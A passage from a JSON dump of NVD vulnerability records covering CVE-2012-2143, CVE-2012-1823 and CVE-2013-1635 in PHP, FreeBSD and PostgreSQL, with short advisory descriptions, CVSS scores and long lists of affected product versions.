crypt) function in FreeBSD before 9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does not process the complete cleartext password if this password contains a 0x80 character, which makes it easier for context-dependent attackers to obtain access via an authentication attempt with an initial substring of the intended password, as demonstrated by a Unicode password.\nAs per: http://git.php.net/?p=php-src.git;a=commitdiff;h=aab49e934de1fff046e659cbec46e3d053b41c34 and http://git.php.net/?p=php-src.git;a=commitdiff_plain;h=aab49e934de1fff046e659cbec46e3d053b41c34\r\n\r\nPHP 5.3.13 and earlier are vulnerable.\r\n", "edition": 5, "cvss3": {}, "published": "2012-07-05T14:55:00", "title": "CVE-2012-2143", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2143"], "modified": "2016-12-08T03:02:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/o:freebsd:freebsd:4.4", "cpe:/a:php:php:5.2.1", "cpe:/o:freebsd:freebsd:7.4", "cpe:/a:php:php:5.2.12", "cpe:/o:freebsd:freebsd:4.1.1", "cpe:/o:freebsd:freebsd:4.9", "cpe:/o:freebsd:freebsd:4.6.2", "cpe:/o:freebsd:freebsd:5.5", "cpe:/a:php:php:5.3.13", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/o:freebsd:freebsd:5.2.1", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/o:freebsd:freebsd:4.1", "cpe:/o:freebsd:freebsd:8.2", "cpe:/a:php:php:5.1.4", "cpe:/o:freebsd:freebsd:6.3", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/o:freebsd:freebsd:5.2", "cpe:/a:php:php:4.0", "cpe:/a:postgresql:postgresql:9.1", "cpe:/a:php:php:3.0.15", "cpe:/o:freebsd:freebsd:1.1.5.1", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:3.0.16", "cpe:/o:freebsd:freebsd:6.2", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.1.6", "cpe:/o:freebsd:freebsd:4.3", "cpe:/o:freebsd:freebsd:3.3", "cpe:/a:php:php:5.2.3", "cpe:/o:freebsd:freebsd:4.11", "cpe:/a:php:php:5.2.5", "cpe:/o:freebsd:freebsd:2.2.1", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/o:freebsd:freebsd:7.3", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:5.3.6", "cpe:/o:freebsd:freebsd:8.3", "cpe:/o:freebsd:freebsd:4.7", "cpe:/a:php:php:3.0.8", "cpe:/o:freebsd:freebsd:5.0", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/o:freebsd:freebsd:2.2", "cpe:/a:php:php:3.0", "cpe:/o:freebsd:freebsd:1.0", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/o:freebsd:freebsd:6.1", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.3.1", "cpe:/o:freebsd:freebsd:3.4", "cpe:/a:php:php:5.2.10", "cpe:/o:freebsd:freebsd:4.6", "cpe:/a:postgresql:postgresql:8.3", "cpe:/a:php:php:4.4.7", "cpe:/o:freebsd:freebsd:2.0.5", "cpe:/a:php:php:4.3.1", "cpe:/o:freebsd:freebsd:2.2.5", "cpe:/a:php:php:5.2.4", "cpe:/o:freebsd:freebsd:5.1", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/o:freebsd:freebsd:3.1", "cpe:/a:php:php:4.2.1", "cpe:/o:freebsd:freebsd:2.2.2", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/o:freebsd:freebsd:4.0", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/o:freebsd:freebsd:2.0", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:postgresql:postgresql:9.0", "cpe:/o:freebsd:freebsd:6.4", "cpe:/o:freebsd:freebsd:3.5", "cpe:/o:freebsd:freebsd:3.2", "cpe:/o:freebsd:freebsd:2.1", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.12", "cpe:/o:freebsd:freebsd:4.5", "cpe:/a:php:php:5.3.7", "cpe:/o:freebsd:freebsd:4.8", "cpe:/a:php:php:3.0.10", "cpe:/o:freebsd:freebsd:7.2", "cpe:/o:freebsd:freebsd:2.2.8", "cpe:/o:freebsd:freebsd:7.1", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/o:freebsd:freebsd:2.2.6", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/o:freebsd:freebsd:3.0", "cpe:/o:freebsd:freebsd:2.2.7", "cpe:/o:freebsd:freebsd:8.0", "cpe:/o:freebsd:freebsd:4.10", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/o:freebsd:freebsd:1.1.5", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/o:freebsd:freebsd:9.0", "cpe:/o:freebsd:freebsd:7.0", "cpe:/a:php:php:1.0", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:4.1.1", "cpe:/o:freebsd:freebsd:6.0", "cpe:/a:php:php:5.0.0", "cpe:/a:postgresql:postgresql:8.4", "cpe:/o:freebsd:freebsd:8.1", "cpe:/o:freebsd:freebsd:2.1.7", "cpe:/a:php:php:5.2.14", "cpe:/o:freebsd:freebsd:1.1", "cpe:/o:freebsd:freebsd:5.3", "cpe:/o:freebsd:freebsd:2.1.5", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6", "cpe:/o:freebsd:freebsd:2.1.6", "cpe:/o:freebsd:freebsd:4.2", "cpe:/o:freebsd:freebsd:5.4", "cpe:/a:php:php:5.2.16"], "id": "CVE-2012-2143", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2143", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.8:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:1.1.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:8.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:5.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.3:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:8.4:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.4:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:1.1:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:3.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:postgresql:postgresql:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:18", "description": "sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.", "edition": 5, "cvss3": {}, "published": "2012-05-11T10:15:00", "title": "CVE-2012-1823", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1823"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:php:php:5.1.5", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.4.1", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.7", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:5.2.16"], "id": "CVE-2012-1823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:39", "description": "ext/soap/soap.c in PHP before 5.3.22 and 5.4.x before 5.4.13 does not validate the relationship between the soap.wsdl_cache_dir directive and the open_basedir directive, which allows remote attackers to bypass intended access restrictions by triggering the creation of cached SOAP WSDL files in an arbitrary directory.", "edition": 5, "cvss3": {}, "published": "2013-03-06T13:10:00", "title": "CVE-2013-1635", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1635"], "modified": "2014-01-28T04:51:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.4.12", "cpe:/a:php:php:5.3.13", "cpe:/a:php:php:5.4.1", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:5.4.8", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.4.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:5.3.21", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", 